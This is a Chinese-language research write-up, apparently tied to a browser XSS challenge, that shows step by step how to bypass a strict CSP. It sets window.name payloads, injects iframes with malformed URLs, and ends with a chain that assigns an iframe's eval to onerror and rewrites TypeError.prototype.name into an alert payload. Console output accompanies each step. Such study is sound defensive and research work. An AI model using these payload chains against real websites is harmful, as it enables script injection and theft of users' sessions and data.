研究目标
绕过一个严格CSP策略
default-src ‘self’;
script-src ‘self’;
技巧点一,无CSP的前提下执行任意XSS payload
window.name=eval(alert(1))
location=name
说明:
window.name是可以跨域的,这恶意网站上设置window.name,再让受害者访问有xss漏洞的网站,注入xss payload,location=name,即可在有长度限制前提下,执行任意的xss代码。
这个操作绕不过CSP。
技巧点二,javascript分割符号替代分号
\u2028 \u2029
eval('x=123\u2028alert(x)')
技巧点三,注入任意的HTML代码到网页中
方法展示,这里思路多变,根据实际情况来决定
http://example.com/?test=<img/src="x"/onerror=alert(23)>
document.body.innerHTML=location.search; //document.referrer
document.body.innerHTML=document.body.innerText;
document.body.innerHTML="<img src=x οnerrοr=alert(23)>"
document.body.innerHTML=document.body.innerText
document.body.innerHTML="\u003cimg src=x οnerrοr=alert\u002823\u0029\u003e";
技巧点四,绕过CSP策略
响应头不返回CSP头的方法
发送400请求,响应头中将不设置CSP头
通过 iframe发送%GG或者%2f 解析错误
构造绕过方法如下:
document.body.innerHTML="<iframe name=x src=%GG>"
x.eval("alert(location.href)")
其实是不成功的,原因如下:
这个方法只能在chromium中成功,iframe在等待加载的过程中,其实加载的是about:blank,然而在浏览器机制中,about:blank的空白页会继承父页面的CSP策略,会阻止script的执行。
在firefox中执行结果如下
document.body.innerHTML=”<iframe name=x src=%GG>“;x.eval(“alert(location.href)”)
Uncaught EvalError: call to eval() blocked by CSP <anonymous> debugger eval code:1
debugger eval code:1:53
Content Security Policy: 页面设置阻止读取位于 eval 的一项资源(“script-src”)。 debugger eval code:1:52
Uncaught TypeError: rules_ul is null displayRules https://harderxss.terjanq.me/script.js:77
<anonymous> https://harderxss.terjanq.me/script.js:85
EventListener.handleEvent* https://harderxss.terjanq.me/script.js:81
<anonymous> https://harderxss.terjanq.me/script.js:88
script.js:77:13
Uncaught TypeError: hof is null displayHoF https://harderxss.terjanq.me/script.js:30
<anonymous> https://harderxss.terjanq.me/hof?cb=displayHoF&t=26640459:1
在chrome中执行成功:
document.body.innerHTML=”<iframe name=x src=%2f>“;x.eval(“alert(location.href)”)
undefined
VM317:1 GET https://harderxss.terjanq.me/%2f 404 (Not Found)
iframe加载后about:blank继承父页CSP,使用onload回避该问题
寻找突破方法:
转变思路,在加载过程中执行script,其实就是用onload方法
document.body.innerHTML="<iframe id=x src=data:,1>"
x.onload=atob
这里onload了javascript的atob方法,使页面报错,报错信息如下:
document.body.innerHTML=”<iframe id=x src=data:,1>“
x.onload=atob
ƒ atob() { [native code] }
security.php#:1 Uncaught TypeError: Illegal invocation
修改自定义报错信息,为执行任意xss代码作铺垫
既然报错,可以自定义报错信息,使用如下命令:
TypeError.prototype.name="alert(1)"
自定义onerror方法,这里使用javascript的特性定义了一个方法
onerror=e=>console.log(e)
上面onerror方法定义等价于:
onerror(e){
return console.log(e)
}
该方法将报错信息在控制台打印。
结合一下,代码如下:
document.body.innerHTML="<iframe id=x src=data:,1>"
x.onload=atob
TypeError.prototype.name="alert(1)"
onerror=e=>console.log(e)
执行,结果如下:
document.body.innerHTML=”<iframe id=x src=data:,1>“
x.onload=atob
TypeError.prototype.name=”alert(1)”
onerror=e=>console.log(e)
e=>console.log(e)
VM190:4 Uncaught alert(1): Illegal invocation
security.php#:1 Uncaught alert(1): Illegal invocation
绕过CSP执行任意xss代码
上面定义了onerror的行为,是在console打印错误内容,为了达到执行xss代码的,以下代码先获取一个对象,然后获取全局函数eval,将eval赋值给onerror,然后把错误信息设置为恶意的xss payload,从而达到执行任意代码的目的。
document.body.innerHTML="<iframe id=i src=%GG>"
i.onload=atob
onerror=i.contentWindow.eval
TypeError.prototype.name="-alert(1);var Uncaught//"
// TypeError.prototype.name="alert(1)" //
这里有一个注意点,-alert(1) 和 alert(1),下一行代码是无法正确执行的,这里需要说明下eval()的特性:
eval在执行字符串前,会先检测有没有数学运算符号,有的话会尝试将数学运算符号的对象转换成num值,比如eval(“2+3”)就会返回5
而eval(“alert(1) +alert(1)”) 就会执行两次alert命令,所以某种意义上来说,数学运算符号,可以当做命令字符串中的分割符号。